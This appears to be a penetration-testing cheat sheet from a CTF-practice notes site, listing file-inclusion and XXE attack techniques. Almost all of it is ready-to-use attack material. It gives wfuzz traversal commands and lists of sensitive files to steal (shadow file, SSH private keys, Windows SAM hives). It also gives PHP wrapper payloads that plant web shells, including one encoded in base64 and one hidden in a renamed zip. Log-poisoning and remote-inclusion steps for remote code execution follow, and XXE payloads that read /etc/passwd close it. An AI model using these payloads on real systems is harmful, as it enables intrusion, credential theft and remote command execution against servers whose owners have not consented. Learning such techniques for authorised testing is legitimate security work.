Tryhackme Hackthebox

LFI / XXE

01. Local File Inclusion (LFI)

01.1 Linux

## ------------------| Linux
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hl 367                       
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hl 367                       

wget https://raw.githubusercontent.com/foospidy/payloads/master/other/traversal/dotdotpwn.txt
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w dotdotpwn.txt --hl 367                       

## ------------------| Windows
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt --hl 367

  • Useful LFI files

../../../etc/passwd
../../../../../../../../../../../../etc/passwd

/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.bash_history
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.bash_history
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
/proc/self/environ
/proc/self/cmdline
../index.php
../../index.php
%2e%2e%2findex.php
%252e%252e%252findex.php
../../../../etc/passwd
/var/www/../../etc/passwd
../../../../../etc/passwd%00
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
....//....//etc/passwd
%252e%252e%252fetc%252fpasswd
%252e%252e%252fetc%252fpasswd%00
..///////..////..//////etc/passwd
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd

  • Configuration Files

## ------------------| Apache
/etc/apache2/apache2.conf
/usr/local/etc/apache2/httpd.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/sites-available/000-default.conf
/etc/httpd/conf/httpd.conf
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log

## ------------------| nginx
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
/etc/nginx/sites-available/default
/etc/nginx/nginx.conf
/etc/nginx/proxy_params

## ------------------| MySql
/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYI

## ------------------| Tomcat
/usr/share/tomcat9/bin/catalina.sh
/usr/share/tomcat9/etc/tomcat-users.xml
/var/lib/tomcat9/conf/tomcat-users.xml
/var/lib/tomcat9/conf/server.xml
/var/lib/tomcat9/conf/web.xml
/var/lib/tomcat9/conf/

## ------------------| Spring Boot 
application.properties
application.yml
config/application.properties
config/application.yml

## ------------------| Webroot locations
/var/www/html/            # Apache	
/usr/local/nginx/html/    # Nginx	
c:\inetpub\wwwroot\       # IIS	
C:\xampp\htdocs\          # XAMPP
C:\wamp\www\              # WAMP

  • Log Files

## ------------------| Generic:
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache/error.log

## ------------------| Red Hat/CentOS/Fedora Linux   
/var/log/httpd/access_log

## ------------------| Debian/Ubuntu   
/var/log/apache2/access.log

## ------------------| FreeBSD   
/var/log/httpd-access.log

## ------------------| XAMPP
/xampp/apache/logs/access.log
/xampp/apache/logs/error.log

  • Download running binary file.

## ------------------| Identify runnable tasks and copy the PID 
/proc/sched_debug

## ------------------| Get the location for runnable process and download the file
/proc/<PID>/cmdline

## ------------------| Get linked libs
/proc/<PID>/maps

01.2 Windows

  • Click here for wordlist

  • File Paths

/Windows/win.ini
/windows/system32/license.rtf
/Windows/debug/NetSetup.log
/Users/Administrator/NTUser.dat
/Documents and Settings/Administrator/NTUser.dat
/apache/logs/access.log
/apache/logs/error.log
/apache/php/php.ini
/boot.ini
/inetpub/wwwroot/global.asa
/MySQL/data/hostname.err
/MySQL/data/mysql.err
/MySQL/data/mysql.log
/MySQL/my.cnf
/MySQL/my.ini
/php4/php.ini
/php5/php.ini
/php/php.ini
/Program Files/Apache Group/Apache2/conf/httpd.conf
/Program Files/Apache Group/Apache/conf/httpd.conf
/Program Files/Apache Group/Apache/logs/access.log
/Program Files/Apache Group/Apache/logs/error.log
/Program Files/FileZilla Server/FileZilla Server.xml
/Program Files/MySQL/data/hostname.err
/Program Files/MySQL/data/mysql-bin.log
/Program Files/MySQL/data/mysql.err
/Program Files/MySQL/data/mysql.log
/Program Files/MySQL/my.ini
/Program Files/MySQL/my.cnf
/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
/Program Files/MySQL/MySQL Server 5.0/my.cnf
/Program Files/MySQL/MySQL Server 5.0/my.ini
/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
/Program Files (x86)/Apache Group/Apache/conf/access.log
/Program Files (x86)/Apache Group/Apache/conf/error.log
/Program Files (x86)/FileZilla Server/FileZilla Server.xml
/Program Files (x86)/xampp/apache/conf/httpd.conf
/WINDOWS/php.ini /WINDOWS/Repair/SAM
/Windows/repair/system /Windows/repair/software
/Windows/repair/security
/WINDOWS/System32/drivers/etc/hosts
/WINNT/php.ini
/WINNT/win.ini
/xampp/password
/xampp/tomcat/conf/tomcat-users.xml
/xampp/htdocs/index.php
/xampp/apache/conf/httpd.conf
/xampp/apache/bin/php.ini
/xampp/phpMyAdmin/config.inc.php
/xampp/apache/logs/access.log
/xampp/apache/logs/error.log
/Windows/Panther/Unattend/Unattended.xml
/Windows/Panther/Unattended.xml
/Windows/system32/config/AppEvent.Evt
/Windows/system32/config/SecEvent.Evt
/Windows/system32/config/default.sav
/Windows/system32/config/security.sav
/Windows/system32/config/software.sav
/Windows/system32/config/system.sav
/Windows/system32/config/regback/default
/Windows/system32/config/regback/sam
/Windows/system32/config/regback/security
/Windows/system32/config/regback/system
/Windows/system32/config/regback/software
/Program Files/MySQL/MySQL Server 5.1/my.ini
/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
/Windows/System32/inetsrv/config/applicationHost.config
/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log

01.3 Wrappers & Filters

## ------------------| Basic
?page=data:text/plain,h4rithd
?page=data:text/plain,<?php system($_GET['cmd']); ?>
?page=data:text/plain,<?php echo shell_exec("whoami"); ?>

## ------------------| Base64 and rot13
?page=php://filter/read=string.rot13/resource=index.php
?page=php://filter/convert.base64-encode/resource=index.php
?page=pHp://FilTer/convert.base64-encode/resource=index.php

## ------------------| zlib 
?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
## To read 
# php -a #Starts a php console
# readfile('php://filter/zlib.inflate/resource=test.deflated');

## ------------------| zip://
# echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;  
# zip payload.zip payload.php;
# mv payload.zip shell.jpg;
# rm payload.php
?page=zip://shell.jpg%23payload.php

## ------------------| data://
?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
?page=data://text/plain,<?php phpinfo(); ?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
# NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

## ------------------| expect://
?page=expect://id
?page=expect://ls

## ------------------| input://
?page=php://input
# POST DATA: <?php system('id'); ?>

01.4 LFI to RCEs

include=('$file')

  • Log Poisoning

## ------------------| Basic Payload
<?php phpinfo(); ?>
<?php system($_REQUEST['cmd']); ?>
<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>'; ?>

## ------------------| Send for apache
nc <IP> 80
...enter..payload..here!...

## Your session/auth cookies or any type of session information store on
## ------------------| Linux 
/tmp/sess_
/var/tmp/sess_
/var/lib/php/sessions/sess_
/proc/self/environ/ ## <-- use for User-Agent: <?=phpinfo(); ?>
/var/log/auth.log ## <-- use ssh '<?php system($_REQUEST['cmd']); ?>'@IP        
/var/log/vsftpd.log ## <-- use above payload as username with ftp  
var/log/apache2/access.log ## <-- use it from nc(BEST WAY!!) or use it as http://IP/<?php phpinfo(); ?>
 
## ------------------| Windows
\Windows\TEMP\sess_<session_id> 
c:\xampp\apache\logs\access.log&cmd=ipconfig

01.5 Tricks

  • phpinfo() (file_uploads = on)

# Download this script
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/phpinfolfi.py

01.6 LFI with python

02. Remote File Inclusion

allow_url_include

nc -lvnp 80

## ------------------| Create payload file (php/txt)
<?php phpinfo(); ?>
<?php system($_REQUEST['cmd']); ?>
<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>'; ?>

## ------------------| Execute
### move file to /var/www/html and start apache sever
### execute
=http://<IP>/file.txt

02. XML external entity (XXE) injection

  • Common payloads

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
    <productId>
        &xxe;
    </productId>
</stockCheck>

  • Filters

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php"> ]>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/hosts.php">
PreviousNoSQLiNextCommand Injection

Last updated